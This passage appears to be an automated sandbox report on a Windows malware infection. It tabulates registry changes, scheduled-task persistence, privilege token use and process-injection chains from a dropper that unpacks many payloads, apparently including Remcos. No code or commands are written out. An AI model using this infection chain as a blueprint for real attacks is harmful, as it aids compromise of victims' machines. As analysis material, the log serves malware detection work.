Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\prnfldr.dll,-8036 = "Printers" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\NetworkExplorer.dll,-1 = "Network" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3588 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3588 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3588 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3588 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 3588 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 3432 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 3432 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 5072 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 5072 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 5072 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5072 wrote to memory of 1444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5072 wrote to memory of 1444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5072 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 5072 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 2924 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 2924 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 2924 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 2924 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 2924 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2924 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2924 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3588 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 3588 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 1416 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe
PID 1416 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe
PID 3588 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3588 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3588 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3588 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3588 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3588 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3588 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 3588 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 3588 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3588 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3588 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 2688 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 2688 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 3588 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3588 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3588 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3588 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 3588 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 3588 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
PID 4804 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe C:\Windows\system32\cmd.exe
